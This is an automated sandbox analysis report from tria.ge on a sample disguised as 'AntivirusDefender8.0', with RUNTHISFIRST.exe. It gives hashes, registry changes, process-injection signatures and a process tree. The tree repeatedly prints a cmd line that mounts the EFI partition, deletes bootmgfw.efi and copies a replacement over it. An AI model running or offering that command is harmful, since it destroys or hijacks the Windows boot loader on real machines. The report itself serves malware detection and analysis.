Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
7Static
static
3AntivirusD...in.zip
windows10-2004-x64
1AntivirusD...ibutes
windows10-2004-x64
AntivirusD....0.lnk
windows10-2004-x64
7AntivirusD...ICENSE
windows10-2004-x64
1AntivirusD...DME.md
windows10-2004-x64
3AntivirusD...ST.exe
windows10-2004-x64
1AntivirusD...fw.dll
windows10-2004-x64
1Resubmissions
08/07/2024, 11:05
240708-m639fsyaph 408/07/2024, 11:00
240708-m359msxhrf 308/07/2024, 10:54
240708-mzmm5avgrj 308/07/2024, 10:49
240708-mw431axfra 708/07/2024, 10:46
240708-mtxwxaxfjc 308/07/2024, 10:42
240708-mrn6zsxekb 7Analysis
-
max time kernel
76s -
max time network
77s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
08/07/2024, 10:49
Static task
static1
Behavioral task
behavioral1
Sample
AntivirusDefender8.0-main.zip
Resource
win10v2004-20240704-en
Behavioral task
behavioral2
Sample
AntivirusDefender8.0-main/.gitattributes
Resource
win10v2004-20240704-en
Behavioral task
behavioral3
Sample
AntivirusDefender8.0-main/AntivirusDefender8.0.lnk
Resource
win10v2004-20240704-en
Behavioral task
behavioral4
Sample
AntivirusDefender8.0-main/LICENSE
Resource
win10v2004-20240704-en
Behavioral task
behavioral5
Sample
AntivirusDefender8.0-main/README.md
Resource
win10v2004-20240704-en
Behavioral task
behavioral6
Sample
AntivirusDefender8.0-main/RUNTHISFIRST.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral7
Sample
AntivirusDefender8.0-main/bootmgfw.dll
Resource
win10v2004-20240704-en
Errors
General
-
Target
AntivirusDefender8.0-main/.gitattributes
-
Size
66B
-
MD5
05bdb783ee6514c8c072e47680af8ff7
-
SHA1
ba3dfe345280bdcc5e817bb02cf49b8b8d8e1c4c
-
SHA256
1a1dbe176bc233b499d35a57db7513f2941c99ab9759f177830c9149be99005b
-
SHA512
9e820d6126d62c0b89e380c69685f6668b2f131283f57e524f59492fa6df22844dda1b90d244d4a1f8aea78a84e65d47b1a878168c4e41001459a947ef275ffe
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "231" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings OpenWith.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 840 OpenWith.exe 2072 LogonUI.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 532 wrote to memory of 1808 532 cmd.exe 100 PID 532 wrote to memory of 1808 532 cmd.exe 100 PID 1808 wrote to memory of 1772 1808 cmd.exe 102 PID 1808 wrote to memory of 1772 1808 cmd.exe 102 PID 4024 wrote to memory of 2336 4024 RUNTHISFIRST.exe 106 PID 4024 wrote to memory of 2336 4024 RUNTHISFIRST.exe 106 PID 4024 wrote to memory of 2336 4024 RUNTHISFIRST.exe 106 PID 2336 wrote to memory of 3012 2336 cmd.exe 108 PID 2336 wrote to memory of 3012 2336 cmd.exe 108 PID 2336 wrote to memory of 3012 2336 cmd.exe 108 PID 1284 wrote to memory of 4824 1284 cmd.exe 111 PID 1284 wrote to memory of 4824 1284 cmd.exe 111 PID 4824 wrote to memory of 840 4824 cmd.exe 113 PID 4824 wrote to memory of 840 4824 cmd.exe 113 PID 3204 wrote to memory of 2340 3204 cmd.exe 116 PID 3204 wrote to memory of 2340 3204 cmd.exe 116 PID 2340 wrote to memory of 1564 2340 cmd.exe 118 PID 2340 wrote to memory of 1564 2340 cmd.exe 118 PID 4812 wrote to memory of 864 4812 RUNTHISFIRST.exe 121 PID 4812 wrote to memory of 864 4812 RUNTHISFIRST.exe 121 PID 4812 wrote to memory of 864 4812 RUNTHISFIRST.exe 121 PID 864 wrote to memory of 4556 864 cmd.exe 123 PID 864 wrote to memory of 4556 864 cmd.exe 123 PID 864 wrote to memory of 4556 864 cmd.exe 123
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\AntivirusDefender8.0-main\.gitattributes1⤵
- Modifies registry class
PID:2696
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:840
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:384
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""1⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\system32\cmd.execmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"2⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\system32\mountvol.exemountvol x: /s3⤵PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\AntivirusDefender8.0-main\RUNTHISFIRST.exe"C:\Users\Admin\AppData\Local\Temp\AntivirusDefender8.0-main\RUNTHISFIRST.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c mountvol x: /s2⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\SysWOW64\mountvol.exemountvol x: /s3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""1⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\cmd.execmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"2⤵
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\system32\mountvol.exemountvol x: /s3⤵PID:840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""1⤵
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\system32\cmd.execmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"2⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\system32\mountvol.exemountvol x: /s3⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\AntivirusDefender8.0-main\RUNTHISFIRST.exe"C:\Users\Admin\AppData\Local\Temp\AntivirusDefender8.0-main\RUNTHISFIRST.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c mountvol x: /s2⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\mountvol.exemountvol x: /s3⤵PID:4556
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa396b855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2072
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:4348
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521